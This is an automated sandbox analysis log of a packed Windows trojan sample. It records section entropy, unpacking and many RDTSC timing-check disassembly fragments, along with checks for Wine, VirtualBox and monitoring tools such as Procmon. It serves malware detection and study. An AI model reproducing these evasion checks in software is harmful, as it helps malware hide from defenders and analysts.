    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C429BA0_2_00C429BA
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B47AB00_2_00B47AB0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B48A800_2_00B48A80
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B44A400_2_00B44A40
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B07BF00_2_00B07BF0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC5B420_2_00CC5B42
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B1DB6F0_2_00B1DB6F
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B46CBF0_2_00B46CBF
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B2CCD00_2_00B2CCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B48C020_2_00B48C02
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B2DD290_2_00B2DD29
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B2FD100_2_00B2FD10
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B28D620_2_00B28D62
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B0BEB00_2_00B0BEB0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B16EBF0_2_00B16EBF
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC8E910_2_00CC8E91
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B14E2A0_2_00B14E2A
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B48E700_2_00B48E70
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B2AE570_2_00B2AE57
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD2FD50_2_00CD2FD5
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B08FD00_2_00B08FD0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B47FC00_2_00B47FC0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD1F4D0_2_00CD1F4D
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B0AF100_2_00B0AF10
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CA0F310_2_00CA0F31
    Source: C:\Users\user\Desktop\file.exeCode function: String function: 00B1D300 appears 152 times
    Source: C:\Users\user\Desktop\file.exeCode function: String function: 00B0CAA0 appears 48 times
    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: file.exeStatic PE information: Section: ZLIB complexity 0.9995487830033003
    Source: file.exeStatic PE information: Section: qysaqnfj ZLIB complexity 0.9942368848874353
    Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
    Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@10/2
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B38220 CoCreateInstance,0_2_00B38220
    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: file.exeReversingLabs: Detection: 39%
    Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
    Source: file.exeStatic file information: File size 1852928 > 1048576
    Source: file.exeStatic PE information: Raw size of qysaqnfj is bigger than: 0x100000 < 0x19ae00

    Data Obfuscation

    barindex
    Detected unpacking (changes PE section rights)
    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.b00000.0.unpack :EW;.rsrc :W;.idata :W; :EW;qysaqnfj:EW;cobmpkrb:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;qysaqnfj:EW;cobmpkrb:EW;.taggant:EW;
    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
    Source: file.exeStatic PE information: real checksum: 0x1ce29d should be: 0x1d10bc
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: .rsrc
    Source: file.exeStatic PE information: section name: .idata
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: qysaqnfj
    Source: file.exeStatic PE information: section name: cobmpkrb
    Source: file.exeStatic PE information: section name: .taggant
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE6858 push eax; mov dword ptr [esp], 327CC55Fh0_2_00CE418D
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B8B0A7 push ebx; mov dword ptr [esp], edi0_2_00B8B12C
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B8B0A7 push ecx; mov dword ptr [esp], edi0_2_00B8B15C
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3A0F3 push ebx; mov dword ptr [esp], esi0_2_00D3A116
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3A0F3 push edi; mov dword ptr [esp], edx0_2_00D3A141
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3A0F3 push 142F34ADh; mov dword ptr [esp], esi0_2_00D3A16C
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D310F1 push esi; mov dword ptr [esp], edx0_2_00D31108
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC4045 push ebx; mov dword ptr [esp], 0C26D68Ah0_2_00CC40D2
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC4045 push ebx; mov dword ptr [esp], esi0_2_00CC415E
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC4045 push esi; mov dword ptr [esp], ecx0_2_00CC41CF
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC4045 push ecx; mov dword ptr [esp], edx0_2_00CC423F
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC4045 push 41ED594Eh; mov dword ptr [esp], esp0_2_00CC4254
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC4045 push esi; mov dword ptr [esp], eax0_2_00CC42CE
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC4045 push edx; mov dword ptr [esp], eax0_2_00CC4349
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC4045 push ecx; mov dword ptr [esp], edx0_2_00CC440C
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC4045 push eax; mov dword ptr [esp], ecx0_2_00CC4451
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC4045 push ebp; mov dword ptr [esp], edi0_2_00CC4479
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC4045 push eax; mov dword ptr [esp], 1BF84683h0_2_00CC44AC
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC4045 push 5EEB0944h; mov dword ptr [esp], eax0_2_00CC44EC
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC4045 push esi; mov dword ptr [esp], edx0_2_00CC4515
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC4045 push 11F0B1A9h; mov dword ptr [esp], ecx0_2_00CC4552
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC4045 push edx; mov dword ptr [esp], ecx0_2_00CC458F
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC4045 push edx; mov dword ptr [esp], ebp0_2_00CC45AE
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC4045 push 38083A34h; mov dword ptr [esp], edx0_2_00CC4644
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC4045 push 0D1D4FB1h; mov dword ptr [esp], ebp0_2_00CC4675
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC4045 push 29FD762Ch; mov dword ptr [esp], edi0_2_00CC46FC
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC4045 push 550ECEFBh; mov dword ptr [esp], ebp0_2_00CC4749
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC4045 push esi; mov dword ptr [esp], edi0_2_00CC47D8
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC4045 push ecx; mov dword ptr [esp], eax0_2_00CC4825
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC4045 push ecx; mov dword ptr [esp], ebp0_2_00CC496B
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC4045 push eax; mov dword ptr [esp], ebx0_2_00CC49D5
    Source: file.exeStatic PE information: section name: entropy: 7.981573055299197
    Source: file.exeStatic PE information: section name: qysaqnfj entropy: 7.95363051003985

    Boot Survival

    barindex
    Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
    Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior

    Malware Analysis System Evasion

    barindex
    Tries to detect sandboxes / dynamic malware analysis system (registry check)
    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
    Tries to detect virtualization through RDTSC time measurements
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6425A second address: B6426B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F23E4515396h 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6426B second address: B64278 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F23E44F3786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD2ABA second address: CD2AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD2AC0 second address: CD2AC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD72D1 second address: CD72DD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jnl 00007F23E4515396h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD72DD second address: CD72F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F23E44F3790h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD72F3 second address: CD7315 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F23E45153A8h 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD7466 second address: CD746A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDB153 second address: CDB157 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDB157 second address: CDB165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F23E44F3786h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDB165 second address: CDB169 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDB1C2 second address: CDB20F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23E44F378Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b jno 00007F23E44F3792h 0x00000011 nop 0x00000012 sub dword ptr [ebp+122D2FCAh], esi 0x00000018 push 00000000h 0x0000001a call 00007F23E44F3789h 0x0000001f push esi 0x00000020 pushad 0x00000021 jng 00007F23E44F3786h 0x00000027 jg 00007F23E44F3786h 0x0000002d popad 0x0000002e pop esi 0x0000002f push eax 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDB20F second address: CDB213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDB213 second address: CDB22E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23E44F378Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F23E44F378Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDB22E second address: CDB255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 jmp 00007F23E45153A6h 0x0000000e mov eax, dword ptr [eax] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDB255 second address: CDB259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDB259 second address: CDB25F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDB47B second address: CDB480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDB480 second address: CDB48A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F23E4515396h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDB48A second address: CDB4B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F23E44F3796h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDB4B3 second address: CDB4DE instructions: 0x00000000 rdtsc 0x00000002 jng 00007F23E4515396h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 jmp 00007F23E45153A8h 0x00000017 pop eax 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDB4DE second address: CDB4F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F23E44F3794h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDB620 second address: CDB66F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push edx 0x0000000b jc 00007F23E45153A3h 0x00000011 jmp 00007F23E451539Dh 0x00000016 pop edx 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a push esi 0x0000001b push edi 0x0000001c pop edi 0x0000001d pop esi 0x0000001e jng 00007F23E45153A6h 0x00000024 popad 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jl 00007F23E451539Ch 0x00000031 jp 00007F23E4515396h 0x00000037 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDB66F second address: CDB6D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23E44F3798h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a sub dword ptr [ebp+122D26FFh], ebx 0x00000010 mov cx, 3979h 0x00000014 push 00000003h 0x00000016 cmc 0x00000017 push 00000000h 0x00000019 stc 0x0000001a call 00007F23E44F3799h 0x0000001f call 00007F23E44F378Ah 0x00000024 jo 00007F23E44F3786h 0x0000002a pop esi 0x0000002b pop esi 0x0000002c push 00000003h 0x0000002e sub dword ptr [ebp+122D1C65h], edx 0x00000034 cld 0x00000035 push 4B6BFD59h 0x0000003a pushad 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFBF55 second address: CFBF5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFBF5E second address: CFBF69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F23E44F3786h 0x0000000a pop ecx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFBF69 second address: CFBF6E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFBF6E second address: CFBF8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F23E44F3792h 0x0000000c jbe 00007F23E44F3786h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFBF8D second address: CFBFB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007F23E45153BAh 0x00000010 jmp 00007F23E45153A4h 0x00000015 pushad 0x00000016 push eax 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFBFB6 second address: CFBFBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD0FDF second address: CD0FFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 jmp 00007F23E45153A5h 0x0000000e pop eax 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF9F47 second address: CF9F4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF9F4D second address: CF9F51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF9F51 second address: CF9F55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF9F55 second address: CF9F5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF9F5B second address: CF9F7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F23E44F3790h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007F23E44F3786h 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF9F7B second address: CF9F7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFA31E second address: CFA322 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFA322 second address: CFA32B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFA5C7 second address: CFA5CC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFA740 second address: CFA745 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFA9F1 second address: CFAA01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23E44F378Ah 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFAA01 second address: CFAA14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23E451539Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFAB60 second address: CFAB66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFAB66 second address: CFAB79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F23E451539Fh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFACE8 second address: CFAD05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F23E44F3799h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFAE6B second address: CFAE70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFAE70 second address: CFAE76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFAE76 second address: CFAE7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFAE7A second address: CFAE8E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F23E44F3786h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ecx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF22CA second address: CF22E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F23E451539Dh 0x0000000b js 00007F23E451539Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFB9C5 second address: CFB9C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFB9C9 second address: CFB9DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jno 00007F23E451539Ch 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFB9DD second address: CFB9F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F23E44F3794h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFB9F5 second address: CFB9F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFDE1D second address: CFDE23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFDE23 second address: CFDE28 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
